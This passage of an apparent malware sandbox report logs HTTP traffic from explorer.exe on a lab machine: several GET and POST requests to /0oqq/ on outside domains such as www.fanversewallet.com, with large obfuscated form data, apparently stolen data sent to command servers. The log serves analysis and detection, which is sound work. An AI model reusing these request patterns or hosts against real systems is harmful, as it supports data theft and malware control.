36 6c 5a 39 52 65 59 75 43 49 41 65 6f 6c 76 46 57 4c 48 49 70 7e 68 43 58 68 62 74 48 6a 31 48 2d 61 4a 54 45 52 76 5a 36 67 55 55 53 4c 79 74 77 34 69 66 73 58 5f 67 78 53 79 74 78 71 63 4a 33 37 48 41 62 77 70 35 46 50 56 66 74 71 6b 62 66 6d 45 39 37 6a 42 6f 48 49 49 41 67 6d 7a 6d 36 38 77 62 4b 71 37 74 32 44 33 62 67 51 79 71 54 79 31 79 69 46 74 35 50 68 6d 54 46 59 63 56 72 4e 6a 32 6a 64 34 53 73 47 2d 44 54 75 47 65 30 56 79 7a 42 64 74 42 6a 73 32 6e 75 6f 7a 42 5a 69 2d 55 65 37 46 35 6e 67 71 4f 38 30 41 6f 77 32 67 72 57 61 54 41 31 45 30 34 38 6f 75 63 42 62 67 58 52 47 58 7e 31 59 70 65 73 52 63 37 5a 37 58 67 72 69 6e 48 36 44 4c 6a 5a 4a 45 54 77 7a 4c 73 32 73 5f 79 47 42 6a 62 63 78 49 4d 50 78 5f 42 77 7a 44 61 37 52 4e 5a 52 59 6d 77 6d 35 55 4f 77 71 34 4d 5f 45 58 69 6b 4e 6c 33 48 38 64 61 36 6b 6c 77 55 6a 57 54 35 42 35 69 52 68 76 42 36 33 45 67 54 49 43 55 4a 56 7a 34 4d 73 71 46 67 65 42 75 79 6b 45 6a 38 54 44 57 5f 34 7a 54 4a 51 33 4c 32 73 72 55 6b 47 45 39 6d 37 39 43 56 37 2d 38 62 58 6e 6a 74 66 39 54 5a 4b 44 54 38 63 43 7a 4f 70 46 49 32 7e 77 70 51 76 53 4a 50 30 56 47 73 31 72 58 66 48 38 44 6b 46 6f 4f 57 78 46 59 2d 51 39 42 34 64 47 62 33 79 4c 33 6b 70 69 6c 36 35 64 4b 38 78 65 66 6a 30 65 69 33 6a 39 74 4c 47 6c 76 51 39 6e 62 58 6a 7a 69 51 4f 48 6e 47 38 5f 28 79 35 78 66 65 5a 53 36 6f 73 53 68 50 6b 58 39 45 75 34 55 76 44 6f 59 75 59 56 53 6d 57 54 41 68 63 43 70 43 4f 44 4b 30 58 48 51 64 66 56 4f 4b 38 46 41 4f 56 4a 4b 55 44 4b 4e 6d 4b 4d 7a 34 75 51 6f 31 30 57 78 72 41 50 4f 42 74 5f 4d 35 46 66 62 73 6e 76 52 69 39 49 39 71 55 68 4b 39 35 6e 63 6e 44 6d 6c 5f 31 4b 31 59 6f 55 32 70 52 53 4d 44 33 42 63 76 45 4c 78 74 4e 75 71 49 55 4a 6b 5a 63 33 46 6b 76 6f 73 44 34 4d 63 78 62 57 42 79 45 4d 34 74 72 33 51 36 6d 2d 61 50 61 4c 6f 69 38 69 37 71 6d 75 55 45 75 51 53 76 39 67 63
                                                                                                                      Data Ascii: ICHyvj5=G2OyemQZlLseyi~iXer4Wy2ZF_YgpyzCFxk5e4xNh3A9(u7KQBNienjoADkCSB~eOJomRYypc0H63RkbcEuFURYLJFfhsGwZhHyLbXp6rj3Ve6uy6CwXUPZN6YFlGSkIIROvL3Lcurbbz8H_cbPNPnioLluBPfArhnOtdePau2g15nj79iDRxe9Kk9S8FpkhEtBGXxU76HH_9_EpPl0v(s6sYY4z7MmypAF_5B05Gn9r6NfKJ3UJS3DgIKpqRb82nB8gf6Fa92mM8dhbjk8RXdy1mRKcS0A7TfFzwuWokxSvKe5ez71S1CEWXLisbEa9abNk4AQLKhzPWZGSwdz2keED~aZ7TVGg7fSeiIorOtHI(-MrQCF2CSlIKwYD(fZmdsa7gjpOB78dSiG5MNbQodTQ0mlR8D1mZcBTIriKyAWMEvAqQHf3gY1xkR1PtZMIt4Y_o4V8sWzgGKp82KoqgZbCB8MyAqwQq32dfIkjMDfjTPDU0My_D6YHLA8D4b8-g-QUiOY5PfIvnSSjkG(aJND8e8IXaJ2rGxyO2qOwshxkVolA2rPCwS89JwE77c5MrqWeRkBKflyOL_qzttplFQl1HxB4abcntuGk(tPBgbLRCenvziAByK5TDXj68LqzS9sN9SYsiwFG8f~X5Q2qjmzrw1BqJBVvt2OAO6iGhLvA654oNEPuV2uiYQERpc9yjxAhHIKMstB8rfJ4(oBKH7LlROC6lZ9ReYuCIAeolvFWLHIp~hCXhbtHj1H-aJTERvZ6gUUSLytw4ifsX_gxSytxqcJ37HAbwp5FPVftqkbfmE97jBoHIIAgmzm68wbKq7t2D3bgQyqTy1yiFt5PhmTFYcVrNj2jd4SsG-DTuGe0VyzBdtBjs2nuozBZi-Ue7F5ngqO80Aow2grWaTA1E048oucBbgXRGX~1YpesRc7Z7XgrinH6DLjZJETwzLs2s_yGBjbcxIMPx_BwzDa7RNZRYmwm5UOwq4M_EXikNl3H8da6klwUjWT5B5iRhvB63EgTICUJVz4MsqFgeBuykEj8TDW_4zTJQ3L2srUkGE9m79CV7-8bXnjtf9TZKDT8cCzOpFI2~wpQvSJP0VGs1rXfH8DkFoOWxFY-Q9B4dGb3yL3kpil65dK8xefj0ei3j9tLGlvQ9nbXjziQOHnG8_(y5xfeZS6osShPkX9Eu4UvDoYuYVSmWTAhcCpCODK0XHQdfVOK8FAOVJKUDKNmKMz4uQo10WxrAPOBt_M5FfbsnvRi9I9qUhK95ncnDml_1K1YoU2pRSMD3BcvELxtNuqIUJkZc3FkvosD4McxbWByEM4tr3Q6m-aPaLoi8i7qmuUEuQSv9gcTPPoxEtdK1DhND-SNXpu-uNJ800JyJfEVZisnEq(sBGw-dUf9MEdmWcZKfL9G29XE4Ay072IffxYhI2vdx7Ddhpc6Y3aoVMhEvYioDZ~GiujCNrVIhsqRUJsbbQFRB6yxhSFT94O1EXWPHLN0O5wCEISJtDXRZ8j0PtpR(7p2V-kuYm(9EieFmdhQsWXNOveg0BZc(bb81nRyqjFSd6DQRNbTjo69RNSAkwsSjDjirBaicKmHngdOLfiQGruN8hgrKtj8S2AL0X70KaNuFVClwWk4GxoMxXOepVYFbt~gPhPwXpJoPFS1rMDK7nk8gfzvwrrEh9pMjXiL52yKn08qgDbitw0QLF54B0ltVslbMk54R48U~uRnbsrVa22r5ms4e-PDaBCeAp7_Ylv8(S9hEgd-lkpvNVfKSTSo~gJhYuNPzgMUPtohtP(zU8Y3CkK6BWBheyhJ~lxVOLiK~01iRg52wWqyhYTEWVsCMqe_E5PDQRDRprZBBrBjPf(iPhWTcL7SU6F6YEF0sTRC6kV6gEqU1Yp2SuTVgx0tpTgXX2jWaBqyg1r69y6EYEuKme5sQZYi0eADxZtomzkMvF(PHpg64765dFxy0vESrO7gLdnU5IvN9kECRbF2n8gmsWCSZRyFe1IuQgaGg-cYKdUiudM4vN2HrOoJnw3fQsrNlE6Kfs(wJbnHHNJOae1X1fqwnpLiSJLeF0(gKqjJ55l0FqRqG4XMA5hYvBwSgAyc62Ft1j95kCGXiydwQ5PKPMwTtfEdOAsMIbUdS_6KkzAZk-M-Y9Q5OlzJSzgB7Fg_K6wZh5CelTojLR844qkCITyj2LwMpakYNLl8(SDrAsd2orvzZXEghWU9kQ~l(ySknGB24V4lD7CRPnibjAiuqQN0xisMgtq6nfUW(jR_ae71(7zU1pZGv0sDWVqedawNa_tMj47jmcoYz-trDCwS1s9TwZ~qUijMerAF8cbzAM5gyYX46RKKL8dFJildUl8Ykpskxc(Kjc7Se_Qdp1HCphLm1-dD4UrTHTZgQwXbzxCMncO1dBNnrKSKSE4dbSDye3geAMDVDob6l790RJDEwfen8izk561XBMqcvGu9dywVwQCysPStQdhKrAtWADnwr1Kcvga6Z-hYJFh8PXDj5sgVSKsOCrTYqMynUjxyIzo1Mzft(TVa4lxTvEfNzf9qoeffpsO30B5vL1EcnyOP5nt2DxFarmw-WsGzBT6S~EZRcTOlqwWy9vzfkNtyVFzIkBwQkq9Jmy56vimuuRKcGusFBB~svQG3bPdQYOpjks5oi6e_yqFk18gkX0WBxB1V(3YULxqjGAiBQJ1kBckZholFbTEPXvF7Y0OvMWY1QpKzuvjntjNFz0dDbTrtEkpiGFRbr6qSHx4-b8nChxkXv0H-39yaaPm2yony4tWPXifdhDFcYFlLwRSdKyUV7z9urlui0c4FIa8yLDE-8LuqrrBRZfPWSLX5898NhGPCxKz88czH3qwRb_OeICzi3BZsnwdkB68vyuGLUQlwqvNAiqBrIEK06RudcKlxDsZ89rlb5ZIG(g(A5WQ7yYIkcQ3SGWqW5PzIX0p4SB~14Y8nqk0QpfAqOxK2P2(nx4kTdojK2aRbf7w9cbnZLgeSSYQ0j8QZgoDYo3~QLG6YagBDo-J-YZT3UBy21weR9vL7NxFcw_75gRRFEzR5hbfVm1NOYAse8QGM65LuRU8Qyc5feQj3TkEAERW97qS1QvjcMoldZ3WlmnWkDaIHJ1isvbMsCQHzNB(SSXmjHZdFssVr4Li3lk0COnbKKmuL9iI1dUulKEu9d_BbsR(5r0UmmOa4AyCSRzjtfXEpV-iG7-69Hs91Rqco6gQHBPCd3j2oJ19QuSD_7CpNAmKcLKX53WWGw2iQx5~3Co9WhJdfsoXA7NIQq0FMh0E3jIufx3QOf7EUvffczO7e7ZO93W(-hyqUlaBLMWJgrqASx9lkAI9Lq0a_hFNFdGM2(vnhLlje9KeVU_Li6VlxIXCY7MkdhiETXhr-yzJzP9PFGZ4uCs4Bsh5yX8IU6myqxB~UYOI3wr0bbLRYCLCvnvdGgVnzUKvgD-Y99peF00CzZE6LQI0hi7lhFEvY9-zIkp86yuk8pXjxYt4ViOIcLpYulWIYgkrQyV1BNFJUNxII4eiLX85UNeLOYymdV_x4biOhXTg4JAcL0zWEQcUqwCPFbjVz1D(TyQ4VzvAC1H166tLJnD8jAXkfIhu7UsEweOE8SpcVCvj3YHcbhYCCv5se2-dZUiTbh5PAHRqIxW93LcABceKWERkkVKXfwRf0Q4e_~axJDZxQZt4EfxJcKnIbkeD4yRSEIcLRRnmJX97nXgSoZNifydny78qH5uWL9qQv7ECqJq4v8Zurqp2Sq6(i8VNvCZRyTDJCQcf3yO~0LRxmExHWFg~AbJB3sj8lORiuCFapiponRE1iflajAoLX9hNpHz4duh3XyqkHQ2GD9KS7gwWCDT8cJ8T855L_Wxu_M23V7Q5wb9(qIgsFERUJl7NmOOqqVO8GL43U7_Vjmjdh0uaC9OQolzm8CFKRnzD6tWYK7u2IHh5lV4ZZjUynbortk7TrQ2cRERvtPBxxME6yFDOOWz6piwm5d3czVcI6JryQuUuScqCwpbbaiUs3VRCvq3bg1SHAibGJQB3sTff2KkYBTEChO2DveMGPplHO0SKXq8SxdF9OHMlf8nhE8M
                                                                                                                      Mar 20, 2023 09:10:38.678009033 CET304INHTTP/1.1 404 Not Found
                                                                                                                      Date: Mon, 20 Mar 2023 08:10:38 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      27192.168.2.34972688.99.217.19780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:41.192707062 CET304OUTGET /0oqq/?ICHyvj5=L0mSdT0ooJoC+WTAff+ZGzvWM+chwjv3Dy0WIeNakQkmi/ixITEkKFHCL0Q8UzGKK5QpSY+AVQ3IyxgaFTuxUTcmK0rro2dEnw==&qt9TW=60_ljPJoqo6d2 HTTP/1.1
                                                                                                                      Host: www.glb-mobility.com
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:10:41.219866037 CET305INHTTP/1.1 404 Not Found
                                                                                                                      Date: Mon, 20 Mar 2023 08:10:41 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      28192.168.2.349727203.245.24.4780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:46.770761967 CET306OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.fanversewallet.com
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.fanversewallet.com
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.fanversewallet.com/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 56 67 4d 54 67 4c 72 68 6d 59 50 53 4f 6f 79 30 44 6b 4f 74 75 68 70 63 69 4f 76 63 6c 76 45 58 70 4d 6a 41 4e 51 34 4c 28 65 32 69 53 43 66 54 4e 53 76 57 6f 72 4a 33 77 74 63 30 6c 4b 39 65 34 4a 6e 35 68 32 4f 35 55 55 4c 2d 4f 6a 44 36 6e 7a 41 34 30 64 4d 2d 51 36 77 47 43 53 42 43 33 6e 4c 38 4a 44 58 6e 53 43 49 4d 39 71 63 6f 41 4e 45 78 32 4c 49 76 61 6e 6d 6e 61 34 44 6c 54 64 6b 32 51 4f 55 59 58 6b 50 7a 66 36 4c 79 4a 6d 48 51 65 48 77 73 30 67 63 50 73 66 79 78 71 54 49 55 56 38 43 68 64 4a 63 64 55 41 6f 68 6a 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=VgMTgLrhmYPSOoy0DkOtuhpciOvclvEXpMjANQ4L(e2iSCfTNSvWorJ3wtc0lK9e4Jn5h2O5UUL-OjD6nzA40dM-Q6wGCSBC3nL8JDXnSCIM9qcoANEx2LIvanmna4DlTdk2QOUYXkPzf6LyJmHQeHws0gcPsfyxqTIUV8ChdJcdUAohjA).
                                                                                                                      Mar 20, 2023 09:10:47.041836023 CET306INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Mon, 20 Mar 2023 08:10:46 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Content-Length: 203
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 6f 71 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0oqq/ was not found on this server.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      29192.168.2.349728203.245.24.4780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:49.549992085 CET312OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.fanversewallet.com
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 5337
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.fanversewallet.com
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.fanversewallet.com/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 56 67 4d 54 67 4c 72 68 6d 59 50 53 4f 4a 43 30 45 45 79 74 6f 42 70 64 28 2d 76 63 76 50 45 54 70 4d 28 41 4e 56 4a 51 28 6f 47 69 53 54 50 54 4a 42 48 57 71 72 4a 33 32 74 63 34 68 4b 38 64 34 4a 7a 54 68 30 57 44 55 57 6e 2d 50 31 48 36 7a 44 41 33 72 74 4d 5f 52 36 77 48 66 69 42 43 33 6e 48 47 4a 43 58 64 53 44 41 4d 39 5f 41 6f 41 50 73 79 77 62 49 79 53 48 6d 6e 61 34 50 63 54 64 6c 44 51 4b 41 49 58 67 37 7a 65 6f 28 79 46 58 48 54 5a 58 77 56 71 51 64 69 6a 76 62 31 75 67 4d 55 53 74 53 38 64 73 31 34 65 41 45 6c 35 67 4a 52 42 72 53 45 70 73 30 66 53 45 75 6c 61 34 28 39 59 32 77 44 56 51 38 72 41 43 4b 47 5a 2d 49 4b 75 72 4d 4a 77 49 33 79 77 32 31 36 75 5f 64 2d 7e 78 61 30 59 32 6e 45 7e 65 52 72 36 43 6e 68 4c 46 48 32 50 77 72 6c 59 50 39 50 76 5f 72 47 44 6e 49 65 61 31 49 6a 63 39 47 4d 51 42 58 36 6b 76 43 4c 47 35 77 44 4a 44 4a 63 61 43 76 43 30 67 33 42 4b 4d 6a 54 71 65 55 6e 45 68 46 31 4e 65 48 62 49 42 38 59 31 36 70 66 34 78 61 45 56 35 39 59 34 70 56 75 32 79 67 57 6d 39 68 6a 38 49 30 34 5a 73 52 43 4c 79 72 51 6d 4a 47 36 48 39 61 34 62 30 33 73 35 57 58 73 70 4c 4d 46 51 48 72 32 56 42 44 50 67 58 4b 7a 69 37 75 4e 69 37 61 41 28 44 46 75 33 50 4e 66 7a 6a 50 62 6e 6e 72 4b 68 6f 43 73 33 4e 4c 6b 45 62 73 61 54 52 5a 48 7e 58 63 78 50 43 4e 55 79 54 49 64 34 4b 49 64 6b 2d 34 59 65 55 54 63 42 48 6a 6b 77 44 32 38 62 59 32 66 28 4b 61 33 76 31 45 57 6b 53 32 58 74 74 4c 5f 50 70 7a 37 70 54 44 43 76 67 5a 42 31 73 70 67 71 4a 76 63 73 62 35 31 6c 7a 64 66 42 30 77 34 37 32 34 48 55 4d 70 46 68 66 59 75 45 76 7a 33 38 31 48 4d 68 31 55 6b 31 64 62 5a 49 46 56 39 28 6d 5a 76 32 65 51 6d 76 50 49 78 67 53 68 65 79 7a 5a 6d 65 47 4e 55 33 4b 73 66 4a 58 47 73 73 58 6d 73 50 4d 6f 42 73 58 78 6d 45 34 75 33 4b 7a 4b 51 77 75 70 65 38 64 67 48 77 4c 79 74 47 47 30 63 42 75 58 65 66 79 37 4a 61 73 73 68 6b 51 48 51 48 41 48 52 64 33 76 38 47 56 56 72 43 5f 6a 70 75 4d 77 42 6a 6b 74 37 57 50 76 38 51 6a 45 35 53 42 78 44 7e 5f 34 4f 59 33 47 38 4a 58 63 77 68 62 6a 53 49 50 76 4a 78 74 6e 38 78 6e 72 5a 53 51 4e 71 74 5f 71 68 6a 7a 6b 79 51 6b 39 47 5a 35 77 39 70 64 37 74 34 62 4c 41 66 53 63 71 28 71 51 69 28 37 5a 67 4a 6b 72 54 4f 4f 70 4b 70 30 69 77 72 46 36 35 54 5f 75 6d 37 79 72 46 71 30 48 41 45 72 4c 4d 66 72 74 45 38 58 4b 35 72 33 78 56 79 4d 55 76 75 76 31 48 4d 71 6d 6c 74 4f 70 49 64 6c 6d 54 35 6c 63 33 34 6d 4f 62 56 52 31 51 64 36 6e 54 4d 48 68 2d 35 4b 75 32 42 72 39 56 72 46 74 6a 70 6b 6f 50 4b 51 6a 66 37 49 67 5f 38 33 30 61 75 78 45 32 6e 38 71 4d 6a 71 76 57 5a 6b 53 75 49 55 47 66 50 74 53 63 63 57 5a 55 32 52 50 34 66 34 72 72 35 67 7e 54 54 4e 47 48 31 66 67 65 63 63 33 64 4d 54 70 68 49 52 4e 73 63 74 6f 33 77 76 52 68 51 63 73 50 47 63 42 49 75 64 43 7a 42 6c 73 4e 45 4b 37 6e 68 36 70 6e 67 76 63 59 42 77 71 4a 4a 41 34 6a 64 7a 7a 66 45 52 62 2d 6d 51 31 6b 48 59 76 77 28 43 39 44 4e 4b 30 6b 63 6a 6b 42 46 4e 62 39 28 30 71 7a 73 31 62 72 65 66 31 51 35 63 52 74 4e 74 50 38 69 58 63 2d 5a 6e 66 71 73 63 74 34 34 35 38 6a 75 5a 47 5a 6e 4c 28 32 73 59 53 6f 7e 2d 4e 4f 32 41 33 6a 58 64 56 43 58 65 4e 53 58 5f 48 50 59 71 4c 76 68 4f 39 34 33 79 48 61 53 6f 43 5f 4f 52 35 63 51 6a 6b 79 31 73 45 4d 70 49 34 39 50 49 78 4a 76 48 6e 65 38 54 43 76 34 44 49 6b 42 56 6f 33 44 46 76 42 77 6b 73 5f 56 74 69 4d 45 66 37 6e 30 6e 32 45 49 4a 57 63 7a 78 41 52 4a 6a 46 52 73 73 61 62 74 55 57 30 78 6e 73 32 4b 42 55 73 59 76 53 32 53 58 4d 48 30 51 41 4b 79 74 5a 30 77 33 78 7a 48 63 31 63 55 62 76 67 77 4e 58 38 32 4a 62 72 28 74 46 58 77 46 61 69 41 42 41 6e 6a 76 33 4d 41 56 5a 66 55 69 66 4d 41 39 61 32 61 59 64 7a 66 4f 7a 58 5a 32 77 49 4a 6b 53 30 7a 78 58 42 72 50 4e 5f 54 48 48 45 57 78 55 54 52 34 6a 61 67 59 76 33 7a 72 68 71 4d 4f 65 39 46 63 67 6b 4c 55 59 63 7a 49 50 45 7e 46 30 6e 43 56 41 33 6a 75 44 63 59 59 65 58 59 33 32 64 74 64 73 4e 68 75 56 77 41 41 58 64 38 70 68 34 34 69 28 66 41 57 50 55 74 67 5a 4a 36 4a 59 42 6e 72 37 51 77 51 6c 44 66 38 73 34 76 59 79 6e 32 5f 7e 32 4b 6d 6c 2d 76 42 68 5a 43 62 67 47 41 51 33
                                                                                                                      Data Ascii: ICHyvj5=VgMTgLrhmYPSOJC0EEytoBpd(-vcvPETpM(ANVJQ(oGiSTPTJBHWqrJ32tc4hK8d4JzTh0WDUWn-P1H6zDA3rtM_R6wHfiBC3nHGJCXdSDAM9_AoAPsywbIySHmna4PcTdlDQKAIXg7zeo(yFXHTZXwVqQdijvb1ugMUStS8ds14eAEl5gJRBrSEps0fSEula4(9Y2wDVQ8rACKGZ-IKurMJwI3yw216u_d-~xa0Y2nE~eRr6CnhLFH2PwrlYP9Pv_rGDnIea1Ijc9GMQBX6kvCLG5wDJDJcaCvC0g3BKMjTqeUnEhF1NeHbIB8Y16pf4xaEV59Y4pVu2ygWm9hj8I04ZsRCLyrQmJG6H9a4b03s5WXspLMFQHr2VBDPgXKzi7uNi7aA(DFu3PNfzjPbnnrKhoCs3NLkEbsaTRZH~XcxPCNUyTId4KIdk-4YeUTcBHjkwD28bY2f(Ka3v1EWkS2XttL_Ppz7pTDCvgZB1spgqJvcsb51lzdfB0w4724HUMpFhfYuEvz381HMh1Uk1dbZIFV9(mZv2eQmvPIxgSheyzZmeGNU3KsfJXGssXmsPMoBsXxmE4u3KzKQwupe8dgHwLytGG0cBuXefy7JasshkQHQHAHRd3v8GVVrC_jpuMwBjkt7WPv8QjE5SBxD~_4OY3G8JXcwhbjSIPvJxtn8xnrZSQNqt_qhjzkyQk9GZ5w9pd7t4bLAfScq(qQi(7ZgJkrTOOpKp0iwrF65T_um7yrFq0HAErLMfrtE8XK5r3xVyMUvuv1HMqmltOpIdlmT5lc34mObVR1Qd6nTMHh-5Ku2Br9VrFtjpkoPKQjf7Ig_830auxE2n8qMjqvWZkSuIUGfPtSccWZU2RP4f4rr5g~TTNGH1fgecc3dMTphIRNscto3wvRhQcsPGcBIudCzBlsNEK7nh6pngvcYBwqJJA4jdzzfERb-mQ1kHYvw(C9DNK0kcjkBFNb9(0qzs1bref1Q5cRtNtP8iXc-Znfqsct4458juZGZnL(2sYSo~-NO2A3jXdVCXeNSX_HPYqLvhO943yHaSoC_OR5cQjky1sEMpI49PIxJvHne8TCv4DIkBVo3DFvBwks_VtiMEf7n0n2EIJWczxARJjFRssabtUW0xns2KBUsYvS2SXMH0QAKytZ0w3xzHc1cUbvgwNX82Jbr(tFXwFaiABAnjv3MAVZfUifMA9a2aYdzfOzXZ2wIJkS0zxXBrPN_THHEWxUTR4jagYv3zrhqMOe9FcgkLUYczIPE~F0nCVA3juDcYYeXY32dtdsNhuVwAAXd8ph44i(fAWPUtgZJ6JYBnr7QwQlDf8s4vYyn2_~2Kml-vBhZCbgGAQ3wmFQVax05d-h7WPeJIGrFEKkakVclCZK6HS4l(iwdYE9x0kEP20S93tUk~U1RxUKzmNNM(r1n(6rC4GPBdS2PY-T6SCoiEsNLdi0cIDroCOm9cx4lq-5-6F~BogYQLufl6r4e1w94v1Vv8zIsh7hE7mLHJVeZ~KRLKcjpW30kyQOM2rVZGAKuUsG9LMwF6y6ia80BBRza~jIYqhU16nHJAva26_sERzfVb2cjyNau(x(FDYAXjpWm2XEfsj5wtP5VQZYk9HynKpniydCM0uai0tXWHgeQN9(FlAozcnFvg3FbiAnv834aHYjleXY4MntDMcVRnx~LspprZCj-VXAnP-GLFimKYAMHcnkvjio6jAacG1IA7qylU5sq9lGHXalJS8AUrvpZ8ZTvRbaLxYhDSHQa8mn6B7oEdkq34q6YchT8e74p(-M9bNV6YJ1m~Sfrrylz4A07gYDjeUJo2dTb4yH-ip(gEWB5JBg-9s(hqpCjf6OhfKGuUrkKPglvUhFTixf-QuLjP4n3155x~iO16lrswh8VgayhZWJk6k3YacsBJ3KEnbnFqVAugkhdSMMNQ0pgaQuX5kitE-Dr4JKoN0ZgWCeqTVIiwxY8RGp_gqeRY